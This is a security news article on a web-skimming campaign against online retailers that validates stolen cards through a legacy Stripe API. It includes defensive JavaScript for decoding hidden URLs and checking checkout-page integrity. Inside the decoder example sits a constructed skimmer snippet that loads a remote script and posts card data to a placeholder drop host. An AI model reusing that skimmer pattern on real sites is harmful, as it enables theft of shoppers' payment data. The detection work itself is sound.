Cybersecurity researchers at Jscrambler have uncovered a sophisticated web-skimming campaign targeting online retailers. The campaign uses a legacy application programming interface (API) of a payment provider to validate stolen credit card details in real time before transmitting them to attacker-controlled servers. Validating before exfiltration means the attackers harvest only active, valid card numbers, which raises both the efficiency and the potential profit of the operation.

According to Jscrambler’s analysis, shared with Hackread.com, the operation has been running since at least August 2024. The attack begins with the injection of malicious JavaScript, designed to mimic legitimate payment forms, into the checkout pages of targeted sites; this code captures payment details as customers type them. In the second stage, the script’s critical URLs are stored as base64-encoded strings, which keeps them out of reach of static, pattern-based inspection such as that performed by Web Application Firewalls (WAFs). Base64 is encoding rather than encryption, so the URLs are recoverable by anyone who decodes the strings; the obfuscation only defeats matching on the literal domain names.
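Because the base64 step is reversible, a static scanner can surface the concealed URLs directly. The following is an added example, not code from Jscrambler’s report: it extracts long base64 tokens from a script body and decodes those that yield an http(s) URL. The sample skimmer snippet and the .invalid domains inside it are constructed for this example and are not indicators from the campaign.

```javascript
// Added example (not Jscrambler's code): pull base64 blobs out of a skimmer
// script and decode them so the hidden stage/drop URLs become visible to a
// static scanner or a WAF rule. Runs in Node (uses Buffer); in a browser
// atob() would play the same role.

// Constructed sample of an obfuscated skimmer snippet. The .invalid domains
// are placeholders, not indicators from the report.
const CONSTRUCTED_SKIMMER = `
  var dropUrl = "aHR0cHM6Ly9leGFtcGxlLWRyb3AuaW52YWxpZC9jb2xsZWN0";
  var s = document.createElement("script");
  s.src = atob("aHR0cHM6Ly9leGFtcGxlLWMyLmludmFsaWQvc3RhZ2Uz");
  document.head.appendChild(s);
  fetch(atob(dropUrl), { method: "POST", body: JSON.stringify(card) });
`;

// Candidate tokens: long runs of the base64 alphabet with optional padding.
// Short identifiers (createElement, appendChild) fall under the 16-char floor.
const B64_TOKEN = /[A-Za-z0-9+/]{16,}={0,2}/g;

function looksPrintable(s) {
  // Reject decodes that are mostly non-printable bytes (alnum junk that
  // happened to be long enough to match the regex).
  let ok = 0;
  for (const ch of s) if (ch >= " " && ch <= "~") ok++;
  return s.length > 0 && ok / s.length > 0.9;
}

function findEncodedUrls(scriptText) {
  const hits = [];
  for (const token of scriptText.match(B64_TOKEN) || []) {
    // Strict decode: Buffer is lenient, so re-encode and compare to skip
    // tokens that are not actually well-formed base64.
    const buf = Buffer.from(token, "base64");
    if (buf.toString("base64").replace(/=+$/, "") !== token.replace(/=+$/, "")) continue;
    const text = buf.toString("utf8");
    if (!looksPrintable(text) || !/^https?:\/\//.test(text)) continue;
    let host = null;
    try { host = new URL(text).hostname; } catch { /* malformed URL: keep text only */ }
    hits.push({ token, url: text, host });
  }
  return hits;
}

// Stand-alone run: list every decoded URL and the host it points at.
console.log(findEncodedUrls(CONSTRUCTED_SKIMMER));
```

The host list is what a defender would feed into a blocklist or a WAF rule; the decoded URLs themselves are also the natural pivot for finding the staging server that the next stages are fetched from.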

The key innovation in this campaign is its use of a deprecated version of the Stripe API (Stripe being a widely used payment processor) to verify a card’s validity before the data leaves the page. In the third stage, the legitimate Stripe iframe is hidden and replaced with a look-alike, and the “Place Order” button is cloned while the original is hidden. The entered card data is checked against Stripe’s API, and if the card is confirmed valid, the details are sent immediately to a drop server controlled by the attackers. The shopper is then shown an error message and prompted to reload the page.

Researchers found that the affected retailers mostly run popular e-commerce platforms such as WooCommerce, WordPress, and PrestaShop. They also observed Silent Skimmer variants, though not consistently. Around 49 affected merchants were identified, a figure the researchers suspect is an underestimate, along with two domains serving the attack’s second and third stages; a further 20 domains were hosted on the same server. Jscrambler reported that 15 of the compromised sites had since remediated the issue.

Further probing showed that the skimmer scripts are generated dynamically and tailored to each targeted site, pointing to automated deployment rather than hand-crafted per-victim payloads. To enumerate additional victims, the researchers brute-forced candidate values of the HTTP Referer header in requests to the staging domains, which suggests the staging server keys its response on the site that appears to be requesting it.

In one instance the skimmer impersonated a Square payment iframe; in others it injected additional payment options such as cryptocurrency wallets, dynamically inserting fake MetaMask connection windows. The wallet addresses tied to these attempts showed little or no recent activity, however.

In their blog post, the researchers advise merchants to deploy real-time webpage monitoring to detect unauthorised script injections, and third-party service providers (TPSPs) to adopt hardened iframe implementations that resist iframe hijacking and form modification.
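To make the monitoring advice concrete, here is an added example of a checkout-page integrity check; it is not Jscrambler’s, Stripe’s or any merchant’s code. It flags the changes the campaign makes to the page: a payment iframe from an unexpected origin, the genuine provider iframe hidden by inline style, a duplicated “Place Order” button, and any script loaded from a non-allowlisted origin. The allowlisted origins, the js.stripe.com iframe path and the snapshot of a compromised page are all assumptions constructed for the example. Elements are modelled as plain objects so the check runs in Node; in a browser the same objects would be built from document.querySelectorAll inside a MutationObserver callback and the check re-run on every mutation.

```javascript
// Added example (not Jscrambler's, Stripe's or a merchant's code): a
// checkout-page integrity check of the kind a client-side monitor runs on
// each DOM mutation. Elements are plain {tag, src, style, text} objects so
// the logic is testable in Node; a browser build would produce them from
// document.querySelectorAll("iframe, script, button").

// Assumed allowlists; a real deployment derives these from the merchant's
// own integration, not from this example.
const PAYMENT_IFRAME_ORIGINS = new Set(["https://js.stripe.com"]);
const ALLOWED_SCRIPT_ORIGINS = new Set(["https://js.stripe.com", "https://shop.example"]);

function originOf(url, pageOrigin) {
  // Resolve relative URLs against the page so "/x.js" counts as first-party.
  try { return new URL(url, pageOrigin).origin; } catch { return null; }
}

function isHidden(style) {
  // Inline-style tricks used to conceal the real iframe or the real button.
  const s = (style || "").replace(/\s+/g, "").toLowerCase();
  return /display:none|visibility:hidden|opacity:0(?![.\d])/.test(s)
      || /height:0(px)?(;|$)/.test(s) || /width:0(px)?(;|$)/.test(s);
}

function checkCheckoutPage(snapshot, pageOrigin) {
  const findings = [];
  const submitButtons = [];
  for (const el of snapshot) {
    const tag = el.tag.toLowerCase();
    if (tag === "iframe") {
      const origin = originOf(el.src, pageOrigin);
      if (!PAYMENT_IFRAME_ORIGINS.has(origin)) {
        findings.push({ kind: "unexpected_iframe", origin });      // look-alike frame
      } else if (isHidden(el.style)) {
        findings.push({ kind: "payment_iframe_hidden", origin });  // real frame concealed
      }
    } else if (tag === "script" && el.src) {
      const origin = originOf(el.src, pageOrigin);
      if (!ALLOWED_SCRIPT_ORIGINS.has(origin)) {
        findings.push({ kind: "unexpected_script", origin });      // stage loader
      }
    } else if (tag === "button" && /place order/i.test(el.text || "")) {
      submitButtons.push(el);
    }
  }
  if (submitButtons.length > 1) {
    // A cloned submit button next to a hidden original is the campaign's
    // signature; one button is the normal state.
    const hidden = submitButtons.filter((b) => isHidden(b.style)).length;
    findings.push({ kind: "duplicate_submit_button", count: submitButtons.length, hidden });
  }
  return findings;
}

// Constructed snapshot of a compromised checkout page. Attacker domains are
// .invalid placeholders; the js.stripe.com path is illustrative only.
const CONSTRUCTED_SNAPSHOT = [
  { tag: "script", src: "https://shop.example/checkout.js" },
  { tag: "script", src: "https://example-c2.invalid/stage3" },
  { tag: "iframe", src: "https://js.stripe.com/v3/", style: "display: none" },
  { tag: "iframe", src: "https://example-c2.invalid/fake-card-form", style: "" },
  { tag: "button", text: "Place Order", style: "display:none" },
  { tag: "button", text: "Place Order", style: "" },
];

console.log(checkCheckoutPage(CONSTRUCTED_SNAPSHOT, "https://shop.example"));
```

A check like this complements, rather than replaces, a strict Content Security Policy: CSP decides which scripts may load at all, while a runtime check sees what the page looks like after every script has run, including one that was injected through a trusted first-party file. Inline scripts, which carry no src to allowlist, would additionally need their contents hashed and compared against a known set.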

Screenshot: the iframed fake Square payment form.

“Jscrambler’s research team continues to track this campaign, and we urge all online merchants to prioritize security measures against client-side threats,” researchers concluded.
